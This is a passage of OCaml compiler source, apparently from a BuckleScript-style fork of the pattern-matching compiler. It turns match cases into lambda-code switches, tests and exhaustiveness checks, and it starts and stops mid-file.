        Some (Lstaticraise (idef,[])),jumps_singleton idef ctx
    | [] ->
        (* Act as Total, this means
           If no appropriate default matrix exists,
           then this switch cannot fail *)
        None, jumps_empty
    end
| Total ->
    None, jumps_empty
(* In line with the article and simpler than before *)
(* Failure action in "positive" style: enumerate the constructors not
   matched by [seen] and route each one to the first default matrix
   that covers it.  Falls back to the negative style when too many
   (>= 32) constructors are missing. *)
let mk_failaction_pos partial seen ctx defs =
  if dbg then begin
    prerr_endline "**POS**" ;
    pretty_def defs ;
    ()
  end ;
  (* Assign each yet-untested pattern to the first default matrix whose
     rows it matches; leftovers fall through to later matrices. *)
  let rec scan_def env to_test defs = match to_test,defs with
  | ([],_)|(_,[]) ->
      List.fold_left
        (fun (klist,jumps) (pats,i)->
          let action = Lstaticraise (i,[]) in
          let klist =
            List.fold_right
              (fun pat r -> (get_key_constr pat,action)::r)
              pats klist
          and jumps =
            jumps_add i (ctx_lub (list_as_pat pats) ctx) jumps in
          klist,jumps)
        ([],jumps_empty) env
  | _,(pss,idef)::rem ->
      let now, later =
        List.partition
          (fun (_p,p_ctx) -> ctx_match p_ctx pss) to_test in
      match now with
      | [] -> scan_def env to_test rem
      | _ -> scan_def ((List.map fst now,idef)::env) later rem in
  let fail_pats = complete_pats_constrs seen in
  if List.length fail_pats < 32 then begin
    let fail,jmps =
      scan_def
        []
        (List.map
           (fun pat -> pat, ctx_lub pat ctx)
           fail_pats)
        defs in
    if dbg then begin
      eprintf "POSITIVE JUMPS [%i]:\n" (List.length fail_pats);
      pretty_jumps jmps
    end ;
    None,fail,jmps
  end else begin (* Too many non-matched constructors -> reduced information *)
    if dbg then eprintf "POS->NEG!!!\n%!" ;
    let fail,jumps = mk_failaction_neg partial ctx defs in
    if dbg then
      eprintf "FAIL: %s\n"
        (match fail with
        | None -> "<none>"
        | Some lam -> string_of_lam lam) ;
    fail,[],jumps
  end
(* Combine the compiled cases of a constant match into one test
   construct, chosen by the kind of constant: integer/char switch,
   string switch, or a comparison tree for boxed numbers. *)
let combine_constant names loc arg cst partial ctx def
    (const_lambda_list, total, _pats) =
  let fail, local_jumps =
    mk_failaction_neg partial ctx def in
  let lambda1 =
    match cst with
    | Const_int _ ->
        let int_lambda_list =
          List.map (function Const_int n, l -> n,l | _ -> assert false)
            const_lambda_list in
        call_switcher loc fail arg min_int max_int int_lambda_list names
    | Const_char _ ->
        let int_lambda_list =
          List.map (function Const_char c, l -> (c, l)
            | _ -> assert false)
            const_lambda_list in
        call_switcher loc fail arg 0 max_int int_lambda_list names
    | Const_string _ ->
        (* Note as the bytecode compiler may resort to dichotomic search,
           the clauses of stringswitch are sorted with duplicates removed.
           This partly applies to the native code compiler, which requires
           no duplicates *)
        let const_lambda_list = sort_lambda_list const_lambda_list in
        let sw =
          List.map
            (fun (c,act) -> match c with
            | Const_string (s,_) -> s,act
            | _ -> assert false)
            const_lambda_list in
        let hs,sw,fail = share_actions_tree sw fail in
        hs (Lstringswitch (arg,sw,fail,loc))
    | Const_float _ ->
        make_test_sequence loc
          fail
          (Pfloatcomp Cneq) (Pfloatcomp Clt)
          arg const_lambda_list
    | Const_int32 _ ->
        make_test_sequence loc
          fail
          (Pbintcomp(Pint32, Cneq)) (Pbintcomp(Pint32, Clt))
          arg const_lambda_list
    | Const_int64 _ ->
        make_test_sequence loc
          fail
          (Pbintcomp(Pint64, Cneq)) (Pbintcomp(Pint64, Clt))
          arg const_lambda_list
    | Const_nativeint _ ->
        make_test_sequence loc
          fail
          (Pbintcomp(Pnativeint, Cneq)) (Pbintcomp(Pnativeint, Clt))
          arg const_lambda_list
  in lambda1,jumps_union local_jumps total
(* Split constructor cases into (constant-tag, block-tag) case lists,
   each sorted by tag; unboxed constructors go to the block side. *)
let split_cases tag_lambda_list =
  let rec split_rec = function
      [] -> ([], [])
    | (cstr, act) :: rem ->
        let (consts, nonconsts) = split_rec rem in
        match cstr with
          Cstr_constant n -> ((n, act) :: consts, nonconsts)
        | Cstr_block n -> (consts, (n, act) :: nonconsts)
        | Cstr_unboxed -> (consts, (0, act) :: nonconsts)
        | Cstr_extension _ -> assert false in
  let const, nonconst = split_rec tag_lambda_list in
  sort_int_lambda_list const,
  sort_int_lambda_list nonconst
(* refine [split_cases] and [split_variant_cases] *)
(* Like split_cases but for polymorphic variants: actions keep the
   variant name alongside the lambda. *)
let split_variant_cases tag_lambda_list =
  let rec split_rec = function
      [] -> ([], [])
    | ((name,cstr), act) :: rem ->
        let (consts, nonconsts) = split_rec rem in
        match cstr with
          Cstr_constant n -> ((n, (name, act)) :: consts, nonconsts)
        | Cstr_block n -> (consts, (n, (name, act)) :: nonconsts)
        | Cstr_unboxed -> assert false
        | Cstr_extension _ -> assert false in
  let const, nonconst = split_rec tag_lambda_list in
  sort_int_lambda_list const,
  sort_int_lambda_list nonconst
(* Split extension-constructor cases into constant and block ones.
   When Config.bs_only is set, every case is treated as non-constant. *)
let split_extension_cases tag_lambda_list =
  let rec split_rec = function
      [] -> ([], [])
    | (cstr, act) :: rem ->
        let (consts, nonconsts) = split_rec rem in
        match cstr with
          Cstr_extension(path, true) when not !Config.bs_only -> ((path, act) :: consts, nonconsts)
        | Cstr_extension(path, _) -> (consts, (path, act) :: nonconsts)
        | _ -> assert false in
  split_rec tag_lambda_list
(* Primitive used to compare extension constructor slots. *)
let extension_slot_eq =
  Pccall (Primitive.simple ~name:"#extension_slot_eq" ~arity:2 ~alloc:false)
(* Combine compiled constructor cases.  Extension constructors
   (signalled by cstr_consts < 0) are matched by a linear sequence of
   slot comparisons; ordinary constructors become an if/switch on the
   tag, with special cases for one- and two-constructor types. *)
let combine_constructor sw_names loc arg ex_pat cstr partial ctx def
    (tag_lambda_list, total1, pats) =
  if cstr.cstr_consts < 0 then begin
    (* Special cases for extensions *)
    let fail, local_jumps =
      mk_failaction_neg partial ctx def in
    let lambda1 =
      let consts, nonconsts = split_extension_cases tag_lambda_list in
      (* Without an explicit fail action, one case becomes the default. *)
      let default, consts, nonconsts =
        match fail with
        | None ->
            begin match consts, nonconsts with
            | _, (_, act)::rem -> act, consts, rem
            | (_, act)::rem, _ -> act, rem, nonconsts
            | _ -> assert false
            end
        | Some fail -> fail, consts, nonconsts in
      let nonconst_lambda =
        match nonconsts with
          [] -> default
        | _ ->
            let tag = Ident.create "tag" in
            let tests =
              List.fold_right
                (fun (path, act) rem ->
                  let ext = transl_extension_path ex_pat.pat_env path in
                  Lifthenelse(Lprim(extension_slot_eq , [Lvar tag; ext], loc),
                              act, rem))
                nonconsts
                default
            in
            Llet(Alias, Pgenval,tag, arg, tests)
      in
      List.fold_right
        (fun (path, act) rem ->
          let ext = transl_extension_path ex_pat.pat_env path in
          Lifthenelse(Lprim(extension_slot_eq , [arg; ext], loc),
                      act, rem))
        consts
        nonconst_lambda
    in
    lambda1, jumps_union local_jumps total1
  end else begin
    (* Regular concrete type *)
    let ncases = List.length tag_lambda_list
    and nconstrs = cstr.cstr_consts + cstr.cstr_nonconsts in
    let sig_complete = ncases = nconstrs in
    let fail_opt,fails,local_jumps =
      if sig_complete then None,[],jumps_empty
      else
        mk_failaction_pos partial pats ctx def in
    let tag_lambda_list = fails @ tag_lambda_list in
    let (consts, nonconsts) = split_cases tag_lambda_list in
    let lambda1 =
      match fail_opt,same_actions tag_lambda_list with
      | None,Some act -> act (* Identical actions, no failure *)
      | _ ->
          match
            (cstr.cstr_consts, cstr.cstr_nonconsts, consts, nonconsts)
          with
          | (1, 1, [0, act1], [0, act2]) ->
              (* Typically, match on lists, will avoid isint primitive in that
                 case *)
              let arg =
                if !Config.bs_only && Datarepr.constructor_has_optional_shape cstr then
                  Lprim(is_not_none_bs_primitve , [arg], loc)
                else arg
              in
              Lifthenelse(arg, act2, act1)
          | (2,0, [(i1,act1); (_,act2)],[]) ->
              if i1 = 0 then Lifthenelse(arg, act2, act1)
              else Lifthenelse (arg,act1,act2)
          | (n,0,_,[]) -> (* The type defines constant constructors only *)
              call_switcher loc fail_opt arg 0 (n-1) consts sw_names
          | (n, _, _, _) ->
              let act0 =
                (* = Some act when all non-const constructors match to act *)
                match fail_opt,nonconsts with
                | Some a,[] -> Some a
                | Some _,_ ->
                    if List.length nonconsts = cstr.cstr_nonconsts then
                      same_actions nonconsts
                    else None
                | None,_ -> same_actions nonconsts in
              match act0 with
              | Some act ->
                  Lifthenelse
                    (Lprim (Pisint, [arg], loc),
                     call_switcher loc
                       fail_opt arg
                       0 (n-1) consts sw_names,
                     act)
              (* Emit a switch, as bytecode implements this sophisticated instruction *)
              | None ->
                  let sw =
                    {sw_numconsts = cstr.cstr_consts; sw_consts = consts;
                     sw_numblocks = cstr.cstr_nonconsts; sw_blocks = nonconsts;
                     sw_failaction = fail_opt;
                     sw_names} in
                  let hs,sw = share_actions_sw sw in
                  let sw = reintroduce_fail sw in
                  hs (Lswitch (arg,sw,loc)) in
    lambda1, jumps_union local_jumps total1
  end
(* Test sequence over the constant cases of a polymorphic variant;
   hash values may span the whole int range. *)
let make_test_sequence_variant_constant fail arg int_lambda_list =
  let _, (cases, actions) =
    as_interval fail min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) in
  Switcher.test_sequence arg cases actions
(* Integer switch over polymorphic-variant hash values. *)
let call_switcher_variant_constant loc fail arg int_lambda_list names =
  call_switcher loc fail arg min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names
(* Switch over the tag field (hash) of a non-constant polymorphic
   variant block: bind field 0 first, then switch on it. *)
let call_switcher_variant_constr loc fail arg int_lambda_list names =
  let v = Ident.create "variant" in
  Llet(Alias, Pgenval, v, Lprim(Pfield (0, Fld_poly_var_tag), [arg], loc),
       call_switcher loc
         fail (Lvar v) min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names)
(* Ref cell holding the implementation above; call sites go through (!)
   so another module can rebind it. *)
let call_switcher_variant_constant :
  (Location.t ->
   Lambda.lambda option ->
   Lambda.lambda ->
   (int * (string * Lambda.lambda)) list ->
   Lambda.switch_names option ->
   Lambda.lambda)
  ref= ref call_switcher_variant_constant
(* Ref cell holding the implementation above; call sites go through (!)
   so another module can rebind it. *)
let call_switcher_variant_constr :
  (Location.t ->
   Lambda.lambda option ->
   Lambda.lambda ->
   (int * (string * Lambda.lambda)) list ->
   Lambda.switch_names option ->
   Lambda.lambda)
  ref
  = ref call_switcher_variant_constr
(* Ref cell holding the implementation above; call sites go through (!)
   so another module can rebind it. *)
let make_test_sequence_variant_constant :
  (Lambda.lambda option ->
   Lambda.lambda ->
   (int * (string * Lambda.lambda)) list ->
   Lambda.lambda)
  ref
  = ref make_test_sequence_variant_constant
(* Combine compiled cases of a polymorphic-variant match: count the
   possible constructors of the row (max_int when the row is open) to
   detect completeness, then dispatch on int-vs-block before switching
   on hash values. *)
let combine_variant names loc row arg partial ctx def
    (tag_lambda_list, total1, _pats) =
  let row = Btype.row_repr row in
  let num_constr = ref 0 in
  if row.row_closed then
    List.iter
      (fun (_, f) ->
        match Btype.row_field_repr f with
          Rabsent | Reither(true, _::_, _, _) -> ()
        | _ -> incr num_constr)
      row.row_fields
  else
    num_constr := max_int;
  (* The bs backend tests variant-ness with a dedicated primitive
     instead of Pisint. *)
  let test_int_or_block arg if_int if_block =
    if !Config.bs_only then
      Lifthenelse(Lprim (Pccall(Primitive.simple ~name:"#is_poly_var_block" ~arity:1 ~alloc:false), [arg], loc), if_block, if_int)
    else
      Lifthenelse(Lprim (Pisint, [arg], loc), if_int, if_block) in
  let sig_complete = List.length tag_lambda_list = !num_constr
  and one_action = same_actions tag_lambda_list in (* redundant work under bs context *)
  let fail, local_jumps =
    if
      sig_complete || (match partial with Total -> true | _ -> false)
    then
      None, jumps_empty
    else
      mk_failaction_neg partial ctx def in
  let (consts, nonconsts) = split_variant_cases tag_lambda_list in
  let lambda1 = match fail, one_action with
  | None, Some act -> act
  | _,_ ->
      match (consts, nonconsts) with
      | ([_, (_,act1)], [_, (_,act2)]) when fail=None ->
          test_int_or_block arg act1 act2
      | (_, []) -> (* One can compare integers and pointers *)
          !make_test_sequence_variant_constant fail arg consts
      | ([], _) ->
          let lam = !call_switcher_variant_constr loc
              fail arg nonconsts names in
          (* One must not dereference integers *)
          begin match fail with
          | None -> lam
          | Some fail -> test_int_or_block arg fail lam
          end
      | (_, _) ->
          let lam_const =
            !call_switcher_variant_constant loc
              fail arg consts names
          and lam_nonconst =
            !call_switcher_variant_constr loc
              fail arg nonconsts names in
          test_int_or_block arg lam_const lam_nonconst
  in
  lambda1, jumps_union local_jumps total1
(* Combine compiled array cases: bind the array length once and switch
   on it. *)
let combine_array names loc arg partial ctx def
    (len_lambda_list, total1, _pats) =
  let fail, local_jumps = mk_failaction_neg partial ctx def in
  let lambda1 =
    let newvar = Ident.create "len" in
    let switch =
      call_switcher loc
        fail (Lvar newvar)
        0 max_int len_lambda_list names in
    bind
      Alias newvar (Lprim(Parraylength , [arg], loc)) switch in
  lambda1, jumps_union local_jumps total1
(* Insertion of debugging events *)
let [@inline] event_branch _repr lam = lam
(*
   This exception is raised when the compiler cannot produce code
   because control cannot reach the compiled clause,

   Unused is raised initially in compile_test.

   compile_list (for compiling switch results) catches Unused

   comp_match_handlers (for compiling splitted matches)
   may reraise Unused
*)
exception Unused
(* Compile every cell of a division, skipping cells whose context is
   empty or whose compilation raises Unused; returns the (key, lambda)
   cases, the union of jump summaries, and the head patterns kept. *)
let compile_list compile_fun division =
  let rec c_rec totals = function
    | [] -> [], jumps_unions totals, []
    | (key, cell) :: rem ->
        begin match cell.ctx with
        | [] -> c_rec totals rem
        | _ ->
            try
              let (lambda1, total1) = compile_fun cell.ctx cell.pm in
              let c_rem, total, new_pats =
                c_rec
                  (jumps_map ctx_combine total1::totals) rem in
              ((key,lambda1)::c_rem), total, (cell.pat::new_pats)
            with
            | Unused -> c_rec totals rem
        end in
  c_rec [] division
(* Compile the handlers of an or-pattern split and graft them onto
   [lambda1] as static catches.  When the current body is exactly the
   exit a handler catches, the handler is substituted in directly via
   Alias bindings; Unused handlers become unit handlers. *)
let compile_orhandlers compile_fun lambda1 total1 ctx to_catch =
  let rec do_rec r total_r = function
    | [] -> r,total_r
    | (mat,i,vars,pm)::rem ->
        begin try
          let ctx = select_columns mat ctx in
          let handler_i, total_i =
            compile_fun ctx pm in
          match raw_action r with
          | Lstaticraise (j,args) ->
              if i=j then
                List.fold_right2 (bind Alias) vars args handler_i,
                jumps_map (ctx_rshift_num (ncols mat)) total_i
              else
                do_rec r total_r rem
          | _ ->
              do_rec
                (Lstaticcatch (r,(i,vars), handler_i))
                (jumps_union
                   (jumps_remove i total_r)
                   (jumps_map (ctx_rshift_num (ncols mat)) total_i))
                rem
        with
        | Unused ->
            do_rec (Lstaticcatch (r, (i,vars), lambda_unit)) total_r rem
        end in
  do_rec lambda1 total1 to_catch
(* Generic compilation of a test: divide the matrix, compile each
   sub-matrix and combine the results; with no compilable cell the
   whole test reduces to its failure action, or is Unused. *)
let compile_test compile_fun partial divide combine ctx to_match =
  let division = divide ctx to_match in
  let c_div = compile_list compile_fun division in
  match c_div with
  | [],_,_ ->
      begin match mk_failaction_neg partial ctx to_match.default with
      | None,_ -> raise Unused
      | Some l,total -> l,total
      end
  | _ ->
      combine ctx to_match.default c_div
(* Attempt to avoid some useless bindings by lowering them *)
(* Approximation of v present in lam *)
(* Conservative over-approximation of whether variable [v] occurs in a
   lambda term: any unrecognized term counts as containing [v]. *)
let rec approx_present v = function
  | Lconst _ -> false
  | Lstaticraise (_,args) ->
      List.exists (fun lam -> approx_present v lam) args
  | Lprim (_,args,_) ->
      List.exists (fun lam -> approx_present v lam) args
  | Llet (Alias, _k, _, l1, l2) ->
      approx_present v l1 || approx_present v l2
  | Lvar vv -> Ident.same v vv
  | _ -> true
(* Try to push the Alias binding [let v = arg] down into the sole
   branch of [lam] that mentions [v], avoiding a useless binding on the
   other paths; falls back to binding at the top. *)
let rec lower_bind v arg lam = match lam with
  | Lifthenelse (cond, ifso, ifnot) ->
      let pcond = approx_present v cond
      and pso = approx_present v ifso
      and pnot = approx_present v ifnot in
      begin match pcond, pso, pnot with
      | false, false, false -> lam
      | false, true, false ->
          Lifthenelse (cond, lower_bind v arg ifso, ifnot)
      | false, false, true ->
          Lifthenelse (cond, ifso, lower_bind v arg ifnot)
      | _,_,_ -> bind Alias v arg lam
      end
  | Lswitch (ls,({sw_consts=[i,act] ; sw_blocks = []} as sw), loc)
    when not (approx_present v ls) ->
      Lswitch (ls, {sw with sw_consts = [i,lower_bind v arg act]}, loc)
  | Lswitch (ls,({sw_consts=[] ; sw_blocks = [i,act]} as sw), loc)
    when not (approx_present v ls) ->
      Lswitch (ls, {sw with sw_blocks = [i,lower_bind v arg act]}, loc)
  | Llet (Alias, k, vv, lv, l) ->
      if approx_present v lv then
        bind Alias v arg lam
      else
        Llet (Alias, k, vv, lv, lower_bind v arg l)
  | Lvar u when Ident.same u v && Ident.name u = "*sth*" ->
      arg (* eliminate let *sth* = from_option x in *sth* *)
  | _ ->
      bind Alias v arg lam
(* Bind [v] to [arg], attempting to lower the binding when it is an
   Alias of a non-variable argument. *)
let bind_check str v arg lam = match str,arg with
| _, Lvar _ ->bind str v arg lam
| Alias,_ -> lower_bind v arg lam
| _,_ -> bind str v arg lam
(* Compile a matrix with no clauses left: jump to the innermost default. *)
let comp_exit ctx m = match m.default with
| (_,i)::_ -> Lstaticraise (i,[]), jumps_singleton i ctx
| _ -> fatal_error "Matching.comp_exit"
(* Compile the first matrix, then each handler matrix in turn, wrapping
   the body in a static catch for each exit; handlers whose incoming
   context is empty, or whose compilation raises Unused, become unit
   handlers.  If the first matrix itself is Unused, retry with the next. *)
let rec comp_match_handlers comp_fun partial ctx arg first_match next_matchs =
  match next_matchs with
  | [] -> comp_fun partial ctx arg first_match
  | rem ->
      let rec c_rec body total_body = function
        | [] -> body, total_body
        (* Hum, -1 means never taken
        | (-1,pm)::rem -> c_rec body total_body rem *)
        | (i,pm)::rem ->
            let ctx_i,total_rem = jumps_extract i total_body in
            begin match ctx_i with
            | [] -> c_rec body total_body rem
            | _ ->
                try
                  let li,total_i =
                    comp_fun
                      (match rem with [] -> partial | _ -> Partial)
                      ctx_i arg pm in
                  c_rec
                    (Lstaticcatch (body,(i,[]),li))
                    (jumps_union total_i total_rem)
                    rem
                with
                | Unused ->
                    c_rec (Lstaticcatch (body,(i,[]),lambda_unit))
                      total_rem rem
            end in
      try
        let first_lam,total = comp_fun Partial ctx arg first_match in
        c_rec first_lam total rem
      with Unused -> match next_matchs with
      | [] -> raise Unused
      | (_,x)::xs -> comp_match_handlers comp_fun partial ctx arg x xs
(* To find reasonable names for variables *)
(* Pick an identifier for the matched value from the first clause whose
   pattern binds a name, else create a fresh one from [default]. *)
let rec name_pattern default = function
    (pat :: _, _) :: rem ->
      begin match Typecore.id_of_pattern pat with
      | Some id -> id
      | None -> name_pattern default rem
      end
  | _ -> Ident.create default
(* Ensure the matched argument is a variable, naming it after the
   clauses when a binding must be introduced. *)
let arg_to_var arg cls = match arg with
| Lvar v -> v,arg
| _ ->
    let v = name_pattern "match" cls in
    v,Lvar v
(* To be set by Lam_compile *)
(* Hook (set by Lam_compile) recovering constructor names for switch
   generation; defaults to none. *)
let names_from_construct_pattern : (pattern -> switch_names option) ref =
  ref (fun _ -> None)
(*
   The main compilation function.
   Input:
      repr=used for inserting debug events
      partial=exhaustiveness information from Parmatch
      ctx=a context
      m=a pattern matching

   Output: a lambda term, a jump summary {..., exit number -> context, ...}
*)
(* Main compilation function.  [repr] is used for debug events,
   [partial] is exhaustiveness information from Parmatch, [ctx] the
   matching context and [m] the pattern-matching matrix.  Returns a
   lambda term and a jump summary mapping exit numbers to contexts. *)
let rec compile_match repr partial ctx m = match m with
| { cases = []; args = [] } -> comp_exit ctx m
| { cases = ([], action) :: rem } ->
    if is_guarded action then begin
      let (lambda, total) =
        compile_match None partial ctx { m with cases = rem } in
      event_branch repr (patch_guarded lambda action), total
    end else
      (event_branch repr action, jumps_empty)
| { args = (arg, str)::argl } ->
    let v,newarg = arg_to_var arg m.cases in
    let first_match,rem =
      split_precompile (Some v)
        { m with args = (newarg, Alias) :: argl } in
    let (lam, total) =
      comp_match_handlers
        ((if dbg then do_compile_matching_pr else do_compile_matching) repr)
        partial ctx newarg first_match rem in
    bind_check str v arg lam, total
| _ -> assert false

(* verbose version of do_compile_matching, for debug *)
and do_compile_matching_pr repr partial ctx arg x =
  prerr_string "COMPILE: " ;
  prerr_endline (match partial with Partial -> "Partial" | Total -> "Total") ;
  prerr_endline "MATCH" ;
  pretty_precompiled x ;
  prerr_endline "CTX" ;
  pretty_ctx ctx ;
  let (_, jumps) as r = do_compile_matching repr partial ctx arg x in
  prerr_endline "JUMPS" ;
  pretty_jumps jumps ;
  r

(* Dispatch on the head pattern of the first column: no-test divisions
   for variables/tuples/records/lazy, tested divisions otherwise. *)
and do_compile_matching repr partial ctx arg pmh = match pmh with
| Pm pm ->
    let pat = what_is_cases pm.cases in
    begin match pat.pat_desc with
    | Tpat_any ->
        compile_no_test
          divide_var ctx_rshift repr partial ctx pm
    | Tpat_tuple patl ->
        compile_no_test
          (divide_tuple (List.length patl) (normalize_pat pat)) ctx_combine
          repr partial ctx pm
    | Tpat_record ((_, lbl,_)::_,_) ->
        compile_no_test
          (divide_record lbl.lbl_all (normalize_pat pat))
          ctx_combine repr partial ctx pm
    | Tpat_constant cst ->
        let names = None in
        compile_test
          (compile_match repr partial) partial
          divide_constant
          (combine_constant names pat.pat_loc arg cst partial)
          ctx pm
    | Tpat_construct (_, cstr, _) ->
        let sw_names = !names_from_construct_pattern pat in
        compile_test
          (compile_match repr partial) partial
          divide_constructor
          (combine_constructor sw_names pat.pat_loc arg pat cstr partial)
          ctx pm
    | Tpat_array _ ->
        let names = None in
        compile_test (compile_match repr partial) partial
          divide_array (combine_array names pat.pat_loc arg partial)
          ctx pm
    | Tpat_lazy _ ->
        compile_no_test
          (divide_lazy (normalize_pat pat))
          ctx_combine repr partial ctx pm
    | Tpat_variant(_, _, row) ->
        let names = None in
        compile_test (compile_match repr partial) partial
          (divide_variant !row)
          (combine_variant names pat.pat_loc !row arg partial)
          ctx pm
    | _ -> assert false
    end
| PmVar {inside=pmh ; var_arg=arg} ->
    let lam, total =
      do_compile_matching repr partial (ctx_lshift ctx) arg pmh in
    lam, jumps_map ctx_rshift total
| PmOr {body=body ; handlers=handlers} ->
    let lam, total = compile_match repr partial ctx body in
    compile_orhandlers (compile_match repr partial) lam total ctx handlers

(* Compile a division that needs no runtime test: there is a single
   sub-matrix to compile, then the context is shifted back up. *)
and compile_no_test divide up_ctx repr partial ctx to_match =
  let {pm=this_match ; ctx=this_ctx } = divide ctx to_match in
  let lambda,total = compile_match repr partial this_ctx this_match in
  lambda, jumps_map up_ctx total
(* The entry points *)
(*
   If there is a guard in a matching or a lazy pattern,
   then set exhaustiveness info to Partial.
   (because of side effects, assume the worst).

   Notice that exhaustiveness information is trusted by the compiler,
   that is, a match flagged as Total should not fail at runtime.
   More specifically, for instance if match y with x::_ -> x is flagged
   total (as it happens during JoCaml compilation) then y cannot be []
   at runtime. As a consequence, the static Total exhaustiveness information
   have to be downgraded to Partial, in the dubious cases where guards
   or lazy pattern execute arbitrary code that may perform side effects
   and change the subject values.
   LM:
   Lazy pattern was PR#5992, initial patch by lpw25.
   I have generalized the patch, so as to also find mutable fields.
*)
(* [find_in_pat pred p] walks the whole pattern [p] and reports whether
   [pred] holds for the descriptor of [p] itself or of any of its
   sub-patterns. *)
let find_in_pat pred =
  let rec search pat =
    if pred pat.pat_desc then true
    else
      match pat.pat_desc with
      | Tpat_alias (sub, _, _) | Tpat_variant (_, Some sub, _)
      | Tpat_lazy sub ->
          search sub
      | Tpat_tuple subs | Tpat_construct (_, _, subs) | Tpat_array subs ->
          List.exists search subs
      | Tpat_record (fields, _) ->
          List.exists (fun (_, _, sub) -> search sub) fields
      | Tpat_or (left, right, _) ->
          search left || search right
      | Tpat_constant _ | Tpat_var _ | Tpat_any
      | Tpat_variant (_, None, _) ->
          false
  in
  search
(* [is_lazy_pat] holds exactly for a toplevel lazy pattern descriptor. *)
let is_lazy_pat desc = match desc with
  | Tpat_lazy _ -> true
  | Tpat_alias _ | Tpat_variant _ | Tpat_record _
  | Tpat_tuple _ | Tpat_construct _ | Tpat_array _
  | Tpat_or _ | Tpat_constant _ | Tpat_var _ | Tpat_any ->
      false

(* [is_lazy p] holds when [p] contains a lazy pattern anywhere. *)
let is_lazy = find_in_pat is_lazy_pat
(* [have_mutable_field] holds for a record pattern descriptor mentioning
   at least one mutable label. *)
let have_mutable_field desc = match desc with
  | Tpat_record (fields, _) ->
      let mutable_label (_, lbl, _) =
        match lbl.Types.lbl_mut with
        | Mutable -> true
        | Immutable -> false
      in
      List.exists mutable_label fields
  | Tpat_alias _ | Tpat_variant _ | Tpat_lazy _
  | Tpat_tuple _ | Tpat_construct _ | Tpat_array _
  | Tpat_or _ | Tpat_constant _ | Tpat_var _ | Tpat_any ->
      false

(* [is_mutable p] holds when matching [p] may read a mutable field. *)
let is_mutable p = find_in_pat have_mutable_field p
(* Downgrade Total when
1. Matching accesses some mutable fields;
2. And there are guards or lazy patterns.
*)
(* Downgrade a [Total] exhaustiveness flag to [Partial] whenever some
   clause both reads mutable state and runs arbitrary code (a guard or
   a lazy pattern), since that code may mutate the subject value and
   invalidate the static analysis. *)
let check_partial is_mutable is_lazy pat_act_list = function
  | Partial -> Partial
  | Total ->
      let dubious (pats, lam) =
        is_mutable pats && (is_guarded lam || is_lazy pats) in
      (* an empty case list is also treated conservatively *)
      if pat_act_list = [] || List.exists dubious pat_act_list
      then Partial
      else Total

(* Variant for tupled matchings, where each row is a pattern list. *)
let check_partial_list =
  check_partial (List.exists is_mutable) (List.exists is_lazy)
(* Usual variant: one pattern per row. *)
let check_partial = check_partial is_mutable is_lazy
(* have toplevel handler when appropriate *)
(* Initial context: no column examined yet, [n] wildcard columns ahead. *)
let start_ctx n = [ { left = [] ; right = omegas n } ]

(* Wrap [lambda] in a handler for exit [i] when the jump summary shows
   that this exit may actually be taken; otherwise return it unchanged. *)
let check_total total lambda i handler_fun =
  if jumps_is_empty total then lambda
  else Lstaticcatch (lambda, (i, []), handler_fun ())
(* Compile a matching over a single argument [arg].  [handler_fun]
   builds the code run when no clause matches; it is only needed in the
   Partial case, where a default row raising a fresh exit is added. *)
let compile_matching repr handler_fun arg pat_act_list partial =
  let partial = check_partial pat_act_list partial in
  match partial with
  | Partial ->
      let raise_num = next_raise_count () in
      let pm =
        { cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
          args = [arg, Strict] ;
          default = [[[omega]],raise_num]} in
      begin try
        let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
        (* only install the failure handler when it can be reached *)
        check_total total lambda raise_num handler_fun
      with
      | Unused -> assert false (* ; handler_fun() *)
      end
  | Total ->
      (* total match: no default row, and the jump summary must be empty *)
      let pm =
        { cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
          args = [arg, Strict] ;
          default = []} in
      let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
      assert (jumps_is_empty total) ;
      lambda
(* Build the code raising [Match_failure (file, line, char)] for the
   source position [loc]; used as the failure handler of partial
   matches. *)
let partial_function loc () =
  (* [Location.get_pos_info] is too expensive *)
  let (fname, line, char) = Location.get_pos_info loc.Location.loc_start in
  let fname =
    Filename.basename fname
  in
  Lprim(Praise Raise_regular, [Lprim(Pmakeblock(Blk_extension),
          [transl_normal_path Predef.path_match_failure;
           Lconst(Const_block(Blk_tuple,
              [Const_base(Const_string (fname, None));
               Const_base(Const_int line);
               Const_base(Const_int char)]))], loc)], loc)
(* Entry point for an ordinary function body or match expression:
   unmatched values raise Match_failure at [loc]. *)
let for_function loc repr param pat_act_list partial =
  compile_matching repr (partial_function loc) param pat_act_list partial
(* In the following two cases, exhaustiveness info is not available! *)
(* Entry point for [try ... with] handlers; exceptions that match no
   clause are re-raised with their original backtrace. *)
let for_trywith param pat_act_list =
  compile_matching None
    (fun () -> Lprim(Praise Raise_reraise, [param], Location.none))
    param pat_act_list Partial
(* Naive compilation of [let pat = param in body] as a one-clause,
   possibly-partial match. *)
let simple_for_let loc param pat body =
  compile_matching None (partial_function loc) param [pat, body] Partial
(* Optimize binding of immediate tuples

   The goal of the implementation of 'for_let' below, which replaces
   'simple_for_let', is to avoid tuple allocation in cases such as
   this one:

     let (x,y) =
       let foo = ... in
       if foo then (1, 2) else (3,4)
     in bar

   The compiler easily optimizes the simple `let (x,y) = (1,2) in ...`
   case (call to Matching.for_multiple_match from Translcore), but
   didn't optimize situations where the rhs tuples are hidden under
   a more complex context.

   The idea comes from Alain Frisch who suggested and implemented
   the following compilation method, based on Lassign:

     let x = dummy in let y = dummy in
     begin
       let foo = ... in
       if foo then
         (let x1 = 1 in let y1 = 2 in x <- x1; y <- y1)
       else
         (let x2 = 3 in let y2 = 4 in x <- x2; y <- y2)
     end;
     bar

   The current implementation from Gabriel Scherer uses Lstaticcatch /
   Lstaticraise instead:

     catch
       let foo = ... in
       if foo then
         (let x1 = 1 in let y1 = 2 in exit x1 y1)
       else
         (let x2 = 3 in let y2 = 4 in exit x2 y2)
     with x y ->
       bar

   The catch/exit is used to avoid duplication of the let body ('bar'
   in the example), on 'if' branches for example; it is useless for
   linear contexts such as 'let', but we don't need to be careful to
   generate nice code because Simplif will remove such useless
   catch/exit.
*)
(* Rewrite the "return holes" of a lambda context: apply [f] to every
   leaf expression that produces the final value, while keeping the
   surrounding lets, branches and handlers in place.  Raises and static
   raises never return normally, so they are left untouched. *)
let rec map_return f lam = match lam with
